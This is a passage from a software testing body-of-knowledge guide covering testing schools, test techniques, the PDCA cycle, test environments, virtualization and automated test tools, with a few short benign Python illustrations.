development, or consider the production product as a “super-prototype” that can either be
expanded or replaced.
The “V-model” as discussed in section 1.6.5 is ideal for describing both verification and
validation test processes in the SDLC. Regardless of the development life cycle model used,
the basic need for verification and validation tests remains.
Validation is accomplished simply by executing a real-life function (if you wanted to check to
see if your mechanic had fixed the starter on your car, you’d try to start the car). Examples of
validation are shown in Table 1-8. As in the table above, the list is not exhaustive.
Determining when to perform verification and validation relates to the development model
used. In waterfall, verification tends to be phase-end with validation during the unit,
integration, system and UAT processes.
The primary goal of software testing is to prove that the user or stakeholder requirements are
actually delivered in the final product developed. This can be accomplished by tracing these
requirements, both functional and non-functional, into analysis and design models, test plans
and code to ensure they’re delivered. This level of traceability also enables project teams to
track the status of each requirement throughout the development and test process.
1.8.3.1 Example
In the design stage of the project, the tracing will continue to design and test models. Again,
reviews for these deliverables will include a check for traceability to ensure that nothing has
been lost in the translation of analysis deliverables. Requirements mapping to system
components drives the test partitioning strategies. Test strategies evolve along with system
mapping. Those developing test cases need to know where each part of a business rule is
mapped in the application architecture. For example, a business rule regarding a customer
phone number may be implemented on the client side as a GUI field edit for high performance
order entry. In another application it may be implemented as a stored procedure on the data server so the
rule can be enforced across applications.
When the system is implemented, test cases or scenarios will be executed to prove that the
requirements were implemented in the application. Tools can be used throughout the project
to help manage requirements and track the implementation status of each one.
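A minimal sketch of this traceability idea is shown below (the requirement and test case identifiers are hypothetical): each requirement is mapped to the test cases intended to prove it, and any requirement without coverage is flagged before execution begins.

    # Requirements traceability matrix: requirement -> test cases that prove it.
    requirements = ["REQ-001", "REQ-002", "REQ-003"]

    trace_matrix = {
        "REQ-001": ["TC-101", "TC-102"],  # phone number edit on the client (GUI field edit)
        "REQ-002": ["TC-201"],            # phone number rule enforced by a stored procedure
        "REQ-003": [],                    # not yet covered by any test case
    }

    untraced = [req for req in requirements if not trace_matrix.get(req)]
    if untraced:
        print("Requirements with no test coverage:", untraced)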
The Analytical school sees testing as rigorous and technical. This school places emphasis on
modeling or other more theoretical/analytical methods for assessing the quality of the
software.
The Factory school emphasizes reduction of testing tasks to basic routines or very repetitive
tasks. Outsourcing aligns well with the Factory school approach.
In the Quality school the emphasis is on process, with heavy reliance on standards. Testing is a
disciplined sport, and in the Quality school the test team may view themselves as the
gatekeepers who protect the user from poor-quality software.
In the Context-driven school the emphasis is on adapting to the circumstances under which
the product is developed and used. In this school the focus is on product and people rather
than process.
The Agile school emphasizes the continuous delivery of working product. In this school
testing is code-focused and performed by programmers. In the Agile school testing focuses on
automated unit tests as used in test-driven development or test-first development.
The introduction of the schools of software testing was not a moment-in-time event; rather, as
the profession matured and diversity of thought evolved, a relatively discrete number of
similar approaches emerged. No one school of thought is suggested as better than the next,
nor are they competitive; each represents a problem-solving approach to testing software. While
individuals may align themselves with one school or another, the important issue is to
recognize that some approaches may serve a test project better than others. The choice should not be
based on the personal alignment of the individual but rather on the nuances of the project, be it a
legacy “big iron” system or a mobile device application.
sufficient set of test cases from those requirements to ensure that the design and code fully
meet those requirements.
A goal of software testing is to reduce the risk associated with the deployment of an
automated system (the software application). Risk-based testing prioritizes the features and
functions to be tested based on the likelihood of failure and the impact of a failure should it
occur.
Risk-based testing requires the professional tester to look at the application from as many
viewpoints as possible, weighing the likelihood of failure and the impact of a failure should it
occur; a simple prioritization sketch follows the steps below.
1. Make a list of risks. This process should include all stakeholders and must consider
both process risks and product risks.
5. With each iteration and the removal of defects (reduced risk), reevaluate and re-
prioritize tests.
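The prioritization behind these steps can be illustrated with a small sketch (the 1-5 scoring scale and the features listed are assumptions for illustration; the STBOK does not mandate a scoring scheme): each feature is scored for likelihood and impact, and tests are ordered by the resulting risk exposure, then re-scored with each iteration.

    # Risk-based prioritization: exposure = likelihood of failure x impact of failure.
    features = [
        # (feature, likelihood 1-5, impact 1-5)
        ("Interest calculation", 3, 5),
        ("Customer address change", 2, 2),
        ("Nightly statement batch", 4, 4),
    ]

    # Higher exposure is tested first; re-evaluate after each iteration as defects are removed.
    ranked = sorted(features, key=lambda f: f[1] * f[2], reverse=True)
    for name, likelihood, impact in ranked:
        print(f"{name}: exposure = {likelihood * impact}")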
In Model-based Testing test cases are based on a simple model of the application. Generally,
models are used to represent the desired behavior of the application being tested. The
behavioral model of the application is derived from the application requirements and
specification. It is not uncommon that the modeling process itself will reveal inconsistencies
and deficiencies in the requirements and is an effective static test process. Test cases derived
from the model are functional tests, so model-based testing is generally viewed as black-box
testing.
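A minimal sketch of the idea follows (the order states and events are hypothetical): the behavioral model is captured as a state-transition table derived from the requirements, and each transition in the model yields at least one functional, black-box test case.

    # Behavioral model of a hypothetical order: (current state, event) -> expected next state.
    model = {
        ("created", "pay"):    "paid",
        ("paid",    "ship"):   "shipped",
        ("created", "cancel"): "cancelled",
        ("paid",    "cancel"): "refunded",
    }

    # Derive one test case per transition defined in the model.
    for (state, event), expected in model.items():
        print(f"Given an order in '{state}', when '{event}' occurs, expect '{expected}'")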
The term “Exploratory Testing” was coined in 1983 by Dr. Cem Kaner. Dr. Kaner defines
exploratory testing as “a style of software testing that emphasizes the personal freedom and
responsibility of the individual tester to continually optimize the quality of his/her work by
treating test-related learning, test design, test execution, and test result interpretation as
mutually supportive activities that run in parallel throughout the project.” Exploratory
Testing is aligned with the Context Driven testing school of thought.
Exploratory testing has always been performed by professional testers. The Exploratory
Testing style is quite simple in concept; the tester learns things that, together with experience
and creativity, generate good new tests to run. Exploratory testing seeks to find out how the
software actually works and to ask questions about how it will handle difficult and easy cases.
The quality of the testing is dependent on the tester’s skill of inventing test cases and finding
defects. The more the tester knows about the product and different test methods, the better the
testing will be.
Exploratory testing is not a test technique but rather a style of testing used throughout the
application life cycle. According to Dr. Kaner and James Bach, exploratory testing is more a
mindset, “a way of thinking about testing,” than a methodology. As long as the tester is
thinking and learning while testing and subsequent tests are influenced by the learning, the
tester is performing exploratory testing.
Keyword-driven testing, also known as table-driven testing or action word based testing, is a
testing methodology whereby tests are driven wholly by data. Keyword-driven testing uses a
table format, usually a spreadsheet, to define keywords or action words for each function that
will be executed. In Keyword-driven tests the data items are not just data but also the names of
specific functions being tested and their arguments, which are then executed as the test runs.
Keyword-driven testing is well suited for the non-technical tester. KDT also allows
automation to be started earlier in the SDLC and has a high degree of reusability.
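A minimal sketch of the approach follows (the keywords and application functions are hypothetical): the test itself is a table of action words and their arguments, typically maintained in a spreadsheet, and a small driver maps each keyword onto the function that performs it.

    # Application actions exposed to the keyword table (assumed functions for illustration).
    def login(user, password):
        print(f"logging in as {user}")

    def add_to_cart(item, qty):
        print(f"adding {qty} x {item} to the cart")

    def verify_total(expected):
        print(f"verifying that the cart total is {expected}")

    keywords = {"Login": login, "AddToCart": add_to_cart, "VerifyTotal": verify_total}

    # The keyword-driven test: action words plus arguments (normally kept in a spreadsheet).
    test_table = [
        ("Login",       ["tester01", "secret"]),
        ("AddToCart",   ["SKU-1234", 2]),
        ("VerifyTotal", ["19.98"]),
    ]

    # The driver executes each action word with its arguments as the test runs.
    for action, args in test_table:
        keywords[action](*args)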
Structural system testing ensures that the product designed is structurally sound and will function
correctly. It attempts to determine that the technology has been used properly and that when all the
component parts are assembled they function as a cohesive unit. Structural System Testing could be
more appropriately labeled as testing tasks rather than techniques, since it provides the means for
determining that the implemented configuration and the interrelationship of its parts function so
that they can perform the intended tasks. These test tasks are not designed to
ensure that the application system is functionally correct, but rather that it is structurally
sound. Examples of structural system testing tasks are shown in Table 1-10.
Stress testing is designed to determine if the system can function when subjected to large
volumes of work. The areas that are stressed include input transactions, internal tables, disk
space, output, communications, computer capacity, and interaction with people. If the
application functions adequately under stress, it can be assumed that it will function properly
with normal volumes of work.
Execution testing determines whether the system achieves the desired level of proficiency in a
production status. Execution testing can verify response times, turnaround times, as well as
design performance. The execution of a system can be tested in whole or in part using the
actual system or a simulated model of a system.
Recovery is the ability to restart operations after the integrity of the application has been lost.
The process normally involves reverting to a point where the integrity of the system is known,
and then processing transactions up to the point of failure. The time required to recover
operations is affected by the number of restart points, the volume of applications run on the
computer center, the training and skill of the people conducting the recovery operation, and
the tools available for recovery. The importance of recovery will vary from application to
application.
Compliance testing verifies that the application was developed in accordance with
information technology standards, procedures, and guidelines. The methodologies are used to
increase the probability of success, to enable the transfer of people in and out of the project
with minimal cost, and to increase the maintainability of the application system. The type of
testing conducted varies with the phase of the system development life cycle. However, it may
be more important to compliance test adherence to the process during requirements than at
later stages in the life cycle because it is difficult to correct applications when requirements
are not adequately documented.
White-box testing assumes that the path of logic in a unit or program is known. White-box
testing consists of testing paths, branch by branch, to produce predictable results. The
following are white-box testing techniques:
Functional system testing ensures that the system requirements and specifications are
achieved. The process involves creating test conditions for use in evaluating the correctness of
the application. Examples of Functional System Testing are shown in Table 1-11.
Requirements testing verifies that the system can perform its function correctly and that the
correctness can be sustained over a continuous period of time. Unless the system can function
correctly over an extended period of time, management will not be able to rely upon the
system. The system can be tested for correctness throughout the life cycle, but it is difficult to
test the reliability until the program becomes operational. Requirements testing is primarily
performed through the creation of test conditions and functional checklists. Test conditions
are generalized during requirements and become more specific as the SDLC progresses
leading to the creation of test data for use in evaluating the implemented application system.
Error-handling testing determines the ability of the application system to properly process
incorrect transactions. Error-handling testing requires a group of knowledgeable people to
anticipate what can go wrong with the application system in an operational setting. Error-
handling testing should verify that each error condition is properly corrected. This requires error-
handling testing to be an iterative process in which errors are first introduced into the system,
then corrected, then reentered into another iteration of the system to satisfy the complete
error-handling cycle.
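A minimal sketch of this style of test follows (the payment-posting routine is a hypothetical stand-in for the application under test): deliberately incorrect transactions are introduced, and the test verifies that each one is rejected with an error rather than processed silently.

    def post_payment(amount):
        """Hypothetical application routine: rejects non-positive payment amounts."""
        if amount <= 0:
            raise ValueError("payment amount must be positive")
        return {"status": "posted", "amount": amount}

    bad_transactions = [0, -10, -0.01]  # incorrect transactions introduced on purpose
    for amount in bad_transactions:
        try:
            post_payment(amount)
            print(f"FAIL: amount {amount} was accepted but should have been rejected")
        except ValueError as error:
            print(f"PASS: amount {amount} rejected ({error})")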
Parallel testing requires that the same input data be run through two versions of the same
application. Parallel testing can be done with the entire application or with a segment of the
application. Sometimes a particular segment, such as the day-to-day interest calculation on a
savings account, is so complex and important that an effective method of testing is to run the
new logic in parallel with the old logic.
Black-box testing focuses on testing the function of the program or application against its
specification. Specifically, this technique determines whether combinations of inputs and
operations produce expected results. The following are black-box testing techniques. Each
technique is discussed in detail in Skill Category 7.
Boundary Value Analysis is a data selection technique in which test data is chosen from the
“boundaries” of the input or output domain classes, data structures, and procedure parameters.
Choices often include the actual minimum and maximum boundary values, the maximum
value plus or minus one, and the minimum value plus or minus one.
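A small sketch of the technique follows (the 18-to-65 age range is a hypothetical input domain): test values are drawn from the minimum, the maximum, and one above and below each boundary, as described above.

    def boundary_values(minimum, maximum):
        # Boundary Value Analysis for a single numeric input domain.
        return sorted({minimum - 1, minimum, minimum + 1,
                       maximum - 1, maximum, maximum + 1})

    # Example: an age field documented as accepting values 18 through 65.
    print(boundary_values(18, 65))  # [17, 18, 19, 64, 65, 66]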
Decision Table Testing is a technique useful for analyzing logical combinations of conditions and
their resultant actions to minimize the number of test cases needed to test the program’s logic.
State Transition Testing is an analysis of the system to determine a finite number of different states
and the transitions from one state to another. Tests are then based on this analysis.
Pairwise Testing is a combinatorial method that, for each pair of input parameters, tests all possible
discrete combinations of those parameters.
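The coverage goal behind pairwise testing can be illustrated with a short sketch (the parameters and values are hypothetical; in practice a pairwise tool selects a small test set that covers all the enumerated pairs): every combination of values for every pair of parameters must appear in at least one test.

    from itertools import combinations, product

    parameters = {
        "browser":  ["Chrome", "Firefox"],
        "os":       ["Windows", "macOS", "Linux"],
        "language": ["EN", "DE"],
    }

    # Enumerate every parameter-value pair that a pairwise test set must cover.
    required_pairs = set()
    for (p1, values1), (p2, values2) in combinations(parameters.items(), 2):
        for v1, v2 in product(values1, values2):
            required_pairs.add(((p1, v1), (p2, v2)))

    print(f"{len(required_pairs)} parameter-value pairs must each appear in at least one test")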
Cause-Effect Graph is a technique that graphically illustrates the relationship between a given
outcome and all the factors that influence the outcome.
Error Guessing is a test data selection technique for picking values that seem likely to cause
defects. This technique is based on the intuition and experience of the tester.
• Accessibility Testing
• Conversion Testing
• Maintainability Testing
• Reliability Testing
• Stability Testing
• Usability Testing
• Bottom-up
Begin testing from the bottom of the hierarchy and work up to the top. Modules are added
in ascending hierarchical order. Bottom-up testing requires the development of driver
modules, which provide the test input, call the module or program being tested, and
display the test output; a sketch of a simple driver follows.
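A minimal sketch of such a driver (the interest-calculation module is a hypothetical low-level unit): the driver supplies the test input, calls the module under test, and displays the output that a higher-level module would normally consume.

    def calculate_interest(balance, annual_rate, days):
        """Hypothetical low-level module under test."""
        return round(balance * annual_rate * days / 365, 2)

    def driver():
        """Driver module: provides test input, calls the module under test, displays output."""
        test_inputs = [(1000.00, 0.05, 30), (0.00, 0.05, 30), (2500.00, 0.00, 90)]
        for balance, rate, days in test_inputs:
            result = calculate_interest(balance, rate, days)
            print(f"calculate_interest({balance}, {rate}, {days}) -> {result}")

    if __name__ == "__main__":
        driver()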
Within the context of incremental testing, test stubs and drivers are often referred to as a test
harness. This is not to be confused with the term test harness used in the context of test
automation.
When testing client/server applications, these techniques are extremely critical. An example
of an effective strategy for a simple two-tier client/server application could include:
2. Unit and incremental testing of the GUI (graphical user interface) or client components
4. Thread testing of a valid business transaction through the integrated client, server, and
network
Table 1-12 illustrates how the various techniques can be used throughout the standard test
stages.
                               Technique
Stages                         White-Box   Black-Box   Incremental   Thread
Unit Testing                       X
String/Integration Testing        X           X             X           X
System Testing                                X             X           X
Acceptance Testing                            X
It is important to note that when evaluating the paybacks received from various
test techniques, white-box or program-based testing produces a higher defect
yield than the other dynamic techniques when planned and executed correctly.
Skill Category 2
Building the Software Testing Ecosystem

Ecosystem - a community of organisms together with their physical environment,
viewed as a system of interacting and interdependent relationships.1
If the pages of this STBOK talked only to the issues of writing a test case, developing
a test plan, recording a defect, or testing within an Agile framework, the most important
success factor would have been overlooked: the software testing ecosystem. Like any thriving
ecosystem, a thriving testing ecosystem requires balanced interaction and interdependence.
Not unlike the three-legged stool of people, process, and technology, if one leg is missing, the
stool will not fulfill its objective. A successful software testing ecosystem must include the
right organizational policies, procedures, culture, attitudes, rewards, skills, and tools.
1. The American Heritage® Science Dictionary, Copyright © 2002. Published by Houghton Mifflin.
All rights reserved.
The testing ecosystem depends first and foremost on humble, curious, and enlightened leadership.
Without that, the value of the ecosystem is greatly diminished.
An organization’s objectives and the way they are achieved are based on preferences, value
judgments, and management styles. Those preferences and value judgments, which are
translated into standards of behavior, reflect management’s integrity and its commitment to
ethical values.
Ethical behavior and management integrity are products of the “corporate culture.” Corporate
culture includes ethical and behavioral standards, how they are communicated, and how they
are reinforced in practice. Official policies specify what management wants to happen.
Corporate culture determines what actually happens and which rules are obeyed, bent, or
ignored.
Individuals may engage in dishonest, illegal, or unethical acts simply because their
organizations give them strong incentives to do so. Emphasis on “results,” particularly in the
short term, fosters an environment in which the price of failure becomes very high.
Removing or reducing incentives can go a long way toward diminishing undesirable behavior.
Setting realistic performance targets is a sound motivational practice; it reduces
counterproductive stress as well as the incentive for fraudulent reporting that unrealistic
targets create. Similarly, a well-controlled reporting system can serve as a safeguard against a
temptation to misstate results.
The most effective way of transmitting a message of ethical behavior throughout the
organization is by example. People imitate their leaders. Employees are likely to develop the
same attitudes about what’s right and wrong as those shown by top management. Knowledge
that the CEO has “done the right thing” ethically when faced with a tough business decision
sends a strong message to all levels of the organization.
Setting a good example is not enough. Top management should verbally communicate the
entity’s values and behavioral standards to employees. This verbal communication must be
backed up by a formal code of corporate conduct. The formal code is “a widely used method
of communicating to employees the company’s expectations about duty and integrity.” Codes
address a variety of behavioral issues, such as integrity and ethics, conflicts of interest, illegal
or otherwise improper payments, and anti-competitive arrangements. While codes of conduct
can be helpful, they are not the only way to transmit an organization’s ethical values to
employees, suppliers, and customers.
Management has an important function in assigning authority and responsibility for operating
activities and in establishing reporting relationships and authorization protocols. It involves
the degree to which individuals and teams are encouraged to use initiative in addressing issues
and solving problems, as well as limits of their authority. There is a growing tendency to push
authority downward in order to bring decision-making closer to front-line personnel. An
organization may take this tack to become more market-driven or quality focused, perhaps to
eliminate defects, reduce cycle time, or increase customer satisfaction. To do so, the
organization needs to recognize and respond to changing priorities in market opportunities,
business relationships, and public expectations.
Another challenge is ensuring that all personnel understand the objectives of the ecosystem. It
is essential that each individual know how his or her actions interrelate and contribute to
achievement of the objectives.
It is also critical that the work processes represent sound policies, standards, and procedures.
It must be emphasized that the purposes and advantages of standards exist only when sound
work processes are in place. If the processes are defective or out of date, the purposes will not
be met. Poor standards can, in fact, impede quality and reduce productivity.
Policies provide direction, standards are the rules or measures by which the implemented
policies are measured, and the procedures are the means used to meet or comply with the
standards. These definitions show the policy at the highest level, standards established next,
and procedures last. However, the worker sees a slightly different view, which is important in
explaining the practical view of standards.
The objective of the workbench is to produce the defined output products (deliverables) in a
defect-free manner. The procedures and standards established for each workbench are
designed to assist in this objective. If defect-free products are not produced, they should be
reworked until the defects are removed or, with management’s concurrence, the defects can be
noted and the defective products passed to the next workbench.
Many of the productivity and quality problems within the test function are attributable to the
incorrect or incomplete definition of testers’ workbenches. For example, workbenches may
not be established, or too few may be established. A test function may have only one
workbench for software test planning when in fact it should have several, such as a
budgeting workbench, a scheduling workbench, a risk assessment workbench, and a tool
selection workbench. In addition, the test function may have an incompletely defined test data
workbench, which leads to poorly defined test data for whatever tests are performed at that
workbench.
The worker performs defined procedures on the input products in order to produce the output
products. The procedures are step-by-step instructions that the worker follows in performing
his/her tasks. Note that if tools are to be used, they are incorporated into the procedures.
The standards are the measures that the worker uses to validate whether or not the products
have been produced according to specifications. If they meet specifications, they are quality
products or defect-free products. If they fail to meet specifications or standards, they are
defective and subject to rework.
It is the execution of the workbench that defines product quality and is the basis for
productivity improvement. Without process engineering, the worker has little direction or
guidance to know the best way to produce a product and to determine whether or not a quality
product has been produced.
To understand the testing process, it is necessary to understand the workbench concept. In IT,
workbenches are more frequently referred to as phases, steps, or tasks. The workbench is a
way of illustrating and documenting how a specific activity is to be performed.
The workbench and the software testing process, which is comprised of many workbenches,
are illustrated in Figure 2-2.
The workbench concept can be used to illustrate one of the steps involved in testing software
systems. The tester’s unit test workbench consists of these steps:
3. Work is checked to ensure the unit meets specifications and standards, and that the
procedure was followed.
4. If the check finds no problems, the product is released to the next workbench (e.g.,
integration testing).
IT management is responsible for issuing IT policy. Policies define the intent of management,
define direction, and, by definition, are general rules or principles. It is the standards that will
add the specificity needed for implementation of policies. For example, the test team needs
direction in determining how many defects are acceptable in the product under test. If there is
no policy on defects, each worker decides what level of defects is acceptable.
The workers who use the procedures and are required to comply with the standards should be
responsible for the development of those standards and procedures. Management sets the
direction and the workers define that direction. This division permits each to do what they are
best qualified to do. Failure to involve workers in the development of standards and
procedures robs the company of the knowledge and contribution of the workers. In effect, it
means that the people best qualified to do a task (i.e., development of standards and
procedures) are not involved in that task. It does not mean that every worker develops his own
procedures and standards, but that the workers have that responsibility and selected workers
will perform the tasks.
Please note that the software testers should be the owners of test processes—and thus
involved in the selection, development, and improvement of test processes.
One of the best known process improvement models is the Plan-Do-Check-Act model for
continuous process improvement. The PDCA model was developed in the 1930s by Dr.
Walter Shewhart of Bell Labs. The PDCA model is also known as the Deming circle/cycle/
wheel, the Shewhart cycle, and the control circle/cycle. A brief description of the four
components of the PDCA concept is provided below; the cycle is illustrated in Figure 2-3.
Create the conditions and perform the necessary teaching and training to execute the plan.
Make sure everyone thoroughly understands the objectives and the plan. Teach workers the
procedures and skills they need to fulfill the plan and thoroughly understand the job. Then,
perform the work according to these procedures.
Check to determine whether work is progressing according to the plan and whether the
expected results are obtained. Check for performance of the set procedures, changes in
conditions, or abnormalities that may appear. As often as possible, compare the results of the
work with the objectives.
If your checkup reveals that the work is not being performed according to plan or that results
are not as anticipated, devise measures for appropriate action.
If a check detects an abnormality–that is, if the actual value differs from the target value–
search for the cause of the abnormality and eliminate the cause. This will prevent the
recurrence of the defect. Usually you will need to retrain workers and revise procedures to
eliminate the cause of a defect.
Continuous process improvement is not achieved by a one-time pass around the PDCA cycle.
It is by repeating the PDCA cycle continuously that process improvement happens. This
concept is best illustrated by an ascending spiral as shown in Figure 2-4.
Testers testing software developed by a specific software development methodology need to:
3. Identify compatible and incompatible test activities associated with the development
methodology
4. Customize the software test methodology to effectively test the software based on the
specific development methodology used to build the software
In the previous release of the Software Testing Common Body of Knowledge, the Test
Environment components were identified as management support for testing, test processes, test
tools, and a competent testing team. This might sound familiar as those components are now
defined as the software testing ecosystem (this skill category of the STBOK). The review
committee working on the STBOK update decided that defining the Test Environment in such
broad terms was inconsistent with the more contemporary definition which defines the Test
Environment in terms more closely related to the actual testing process. Focusing on a more
technical description of a Test Environment still leaves questions about how discrete and separate
the test environment will be. Is there a test lab? If there is a test lab, is it brick and mortar or a
virtualized test lab?
In the end, the goal of the test environment is to cause the application under test to exhibit true
production behavior while being observed and measured outside of its production
environment.
Understanding the SDLC methodology and what levels of testing will be performed allows
for the development of a checklist for building the Test Environment.
The test environment takes on a variety of potential implementations. In many cases, the test
environment is a “soft” environment segregated within an organization’s development system
allowing for builds to be loaded into the environment and test execution to be launched from
the tester’s normal work area. Test labs are another manifestation of the test environment
which is more typically viewed as a brick and mortar environment (designated, separated,
physical location).
The implementation of and updates to production software impacts the processes and people
using the application solution. To test this impact, the software test team, along with business
stakeholders and process and system experts, needs a replica of the impacted business function.
The Model Office should be an “exact model” defined in both business and technology terms. The
key to the implementation of a Model Office is the process and workflow maps diagramming
how things happen. This should include the who, what, and when of the business process
including manual processing, cycles of business activity, and the related documentation. Like
any testing activity, clearly defining the expected outcomes is critical. The development of the
Model Office requires a detailed checklist like the environment checklist described in 2.3.3.1 above.
Tests performed in the Model Office generally involve complete, end-to-end processing of the
customer’s request using actual hardware, software, data, and other real attributes. The
advantage of testing in a Model Office environment is that all the stakeholders get the
opportunity to see the impact on the organization before the changed system is moved into
production.
2.3.4 Virtualization
The concept of virtualization (within the IT space) usually refers to running multiple operating
systems on a single machine. By its very definition, a virtual “server” is not an actual server but a
virtual version of the real thing. A familiar example of virtualization is running a Mac OS on a
Windows machine or running Windows on a Mac OS system. Virtualization software allows a computer to run
several operating systems at the same time. The obvious advantage of virtualization is the
ability to run various operating systems or applications on a single system without the expense
of purchasing a native system for each OS.
The reality of setting up a test environment is that the financial cost of duplicating all the
production systems required to validate every system under test would be prohibitive.
Virtualization offers a potential solution. The ability to
establish several virtual systems on a single physical machine considerably increases the IT
infrastructure flexibility and the efficiency of hardware usage.
However, there are challenges to using virtualization when setting up a test environment. Not
all operating environments or devices can be emulated by a virtual environment. The
configuration of a virtual system can be complex and not all systems will support
virtualization. There may be equipment incompatibilities or issues with device drivers
between the native OS and the virtual OS.
Testing in a virtual environment provides many benefits to the test organization and can
provide excellent ROI on test dollars. However, in the end, the final application must be tested
in a real operating environment to ensure that the application will work in production.
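The mechanics of standing up and tearing down a virtual test machine can be scripted. The
sketch below is illustrative only: it assumes Vagrant is installed, that a Vagrantfile already
defines guests named win10-guest and ubuntu-guest, and that run_regression_suite is a
hypothetical command available inside each guest; it is not an STBOK-prescribed procedure.

import subprocess

def run_suite_in_vm(vm_name: str, test_command: str) -> int:
    """Bring up a virtual machine, run a test command inside it, then tear it down."""
    subprocess.run(["vagrant", "up", vm_name], check=True)          # start the guest OS
    try:
        # 'vagrant ssh -c' runs a command inside the guest; the command itself is
        # whatever test-runner invocation the project actually uses.
        result = subprocess.run(["vagrant", "ssh", vm_name, "-c", test_command])
        return result.returncode
    finally:
        subprocess.run(["vagrant", "destroy", "-f", vm_name], check=True)  # reclaim resources

if __name__ == "__main__":
    # Hypothetical guest names: one physical host, several virtual operating systems.
    for guest in ("win10-guest", "ubuntu-guest"):
        code = run_suite_in_vm(guest, "run_regression_suite")
        print(f"{guest}: {'PASS' if code == 0 else 'FAIL'}")

Even with such scripting, as noted above, the final application must still be validated in a real
operating environment before production.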
The testing organization should select which testing tools they want used in testing and then
incorporate their use into the testing procedures. Tool usage is not optional but mandatory.
However, a procedure could include more than one tool and give the tester the option to select
the most appropriate one given the testing task to be performed.
Equally important is the understanding that the decision to automate and the tool selected
should be the result of a specific need and careful analysis. Too many unsuccessful automated
tool implementation projects trace their root cause to poor planning and execution of the
acquisition process. A detailed tool acquisition process is
given in section 2.5.
The software test automation industry today is represented by an array of companies and
technologies. Commercial tool companies, some with roots going back to the 1980s, have
provided robust tool sets across many technologies. In contrast to the commercial tool
products are the open source test tools. Both commercial and open source tools can provide
significant value to the software test organization when implemented intelligently. The most
important concept is to understand the needs and, from that, discern the true cost of
ownership when evaluating commercial versus open source options. Note: While
the term “commercial” tool is generally accepted as defined within the context of this
discussion, “proprietary” would be a more accurate term as there are commercial open source
tools on the market as well as proprietary free tools.
Commercial automated test tools have been around for many years. Their evolution has
followed the evolution of the software development industry. Within the commercial test tool
category there are the major players, represented by a handful of large IT companies, and the
second-tier tool companies, which are significant in number and growing daily.
Shown below are “generalized” statements about both the positive and negative aspects of
commercial tools. Each item could reasonably have the words “may be” in front of the
statement (e.g., may be easy to use). Characteristics of commercial tools include:
• Positives
Maturity of the product
Stability of the product
Mature implementation processes
Ease of use
Availability of product support teams
Substantial user base
Number of testers already familiar with tools
Significant third party resources in training and consulting
Out-of-the-box implementation with less code customization
More efficient code
A lower risk recommendation (old saying: “No one ever got fired for buying
IBM.”)
• Negatives
Expensive licensing model
Require high priced consultants
Expensive training costs
Custom modifications require specialized programming skills using knowledge of
the proprietary language
Less flexibility
Shown below are “generalized” statements about both the positive and negative aspects of
open source tools. Each item could reasonably have the words “may be” in front of the
statement (e.g., may be more flexibility).
The positive and negative aspects of open source automated tools include:
• Positives
Lower cost of ownership
More flexibility
Easier to make custom modifications
Innovative technology
Continuing enhancements through open source community
Based on standard programming languages
Management sees them as “faster, cheaper, better”
Easier procurement
• Negatives
Open source tool could be abandoned
No single source of support
Test or development organization is not in the business of writing automated tools
Fewer testers in marketplace with knowledge of tool
The notion that an open source tool is free is a dangerous misconception. While one advantage
of open source may be lower cost of ownership, in reality the opportunity costs to the testing
and/or development organization of dedicating resources to something for which a COTS
(commercial off the shelf) product exists need to be carefully analyzed. A decision about
commercial versus open source should never be first and foremost about the costs but about
choosing the right tool for the right job. Section 2.5 discusses the Tool Acquisition process.
A debate often occurs regarding the value of specialized tools designed to meet a relatively
narrow objective versus a more generalized tool that may have functionality that covers the
specific need but at a much higher or less detailed level along with other functionality that
may or may not be useful to the acquiring organization. Within the automated test tool
industry, the debate is alive and well. Some organizations have developed niche tools that
concentrate on a very specific testing need. Generalized testing tools focus on providing a
testing experience across a wider swath of the life cycle. In many cases the specialized tools
have interfaces to the larger generalized tools which, when coupled together, provide the best
of both worlds. Regardless, understanding the test automation need should drive tool
acquisition.
There are literally hundreds of tools available for testers. At the most general level, our
categorization of tools relates primarily to the test process that is automated by the tool. The
most commonly used tools can be grouped into the following areas:
• Automated Regression Testing Tools Tools that can capture test conditions and
results for testing new versions of the software.
• Defect Management Tools Tools that record defects uncovered by testers and then
maintain information on those defects until they have been successfully addressed.
• Performance/Load Testing Tools Tools that can “stress” the software. The tools are
looking for the ability of the software to process large volumes of data without losing
data, returning data to the users unprocessed, or suffering significant reductions in
performance.
• Manual Tools One of the most effective of all test tools is a simple checklist
indicating either items that testers should investigate or steps to ensure they have
performed test activities correctly. There are many manual tools such as decision
tables, test scripts used to enter test transactions, and checklists for testers to use when
performing testing techniques such as reviews and inspections.
• Traceability Tools The most frequent use of traceability tools is to trace
requirements from inception of the project through operations.
• Code Coverage Tools that can indicate the amount of code that has been executed
during testing. Some of these tools can also identify non-entrant code.
• Specialized Tools This category includes tools that test GUI, security, and mobile
applications.
Most testing organizations agree that if the following three guidelines are adhered to, tool
usage will be more effective and efficient.
• Guideline 1 Testers should not be permitted to use tools for which they have not
received formal training.
• Guideline 2 The use of test tools should be incorporated into test processes so that
the use of tools is mandatory, not optional.
• Guideline 3 Testers should have access to an individual in their organization, or the
organization that developed the tool, to answer questions or provide guidance on using
the tool.
2.4.2.1 Advantages
• Relentlessness Tests can be run day and night, 24 hours a day, potentially delivering
the equivalent of the efforts of several full-time testers in the same time period.
• Simulate Load Automated testing can simulate thousands of virtual users
interacting with the application under test (a minimal sketch of this idea follows this list).
• Efficiency Automating boring, repetitive tasks not only improves employee morale,
but also frees up time for staff to pursue other tasks they otherwise could not or would
not pursue, making greater breadth and depth of testing possible.
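To make the “virtual users” idea concrete, the minimal sketch below drives a hypothetical
HTTP endpoint with concurrent simulated users using only the Python standard library.
Commercial and open source load tools add ramp-up profiles, think time, and distributed load
agents, so treat this as an illustration of the concept rather than a load-testing tool; the URL
and user count are assumptions.

import concurrent.futures
import time
import urllib.request

TARGET_URL = "http://localhost:8080/health"  # hypothetical endpoint of the application under test
VIRTUAL_USERS = 100                           # scaled down from "thousands" for illustration

def virtual_user(_user_id: int) -> float:
    """Simulate one user issuing a request and return the observed response time."""
    start = time.perf_counter()
    with urllib.request.urlopen(TARGET_URL, timeout=10) as response:
        response.read()
    return time.perf_counter() - start

if __name__ == "__main__":
    with concurrent.futures.ThreadPoolExecutor(max_workers=VIRTUAL_USERS) as pool:
        timings = list(pool.map(virtual_user, range(VIRTUAL_USERS)))
    print(f"{len(timings)} virtual users, worst response {max(timings):.3f}s, "
          f"average {sum(timings)/len(timings):.3f}s")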
2.4.2.2 Disadvantages
The direct responsibility of both the individual and the organization that employs that individual is
to ensure the necessary competencies exist to fulfill the test organization’s objectives. However, the
individual has the primary responsibility to ensure that his/her competencies are adequate and
current. For example, if a tester today was conducting manual testing of Cobol programs, and that
tester had no other skill sets than testing Cobol programs, the probability of long-term employment
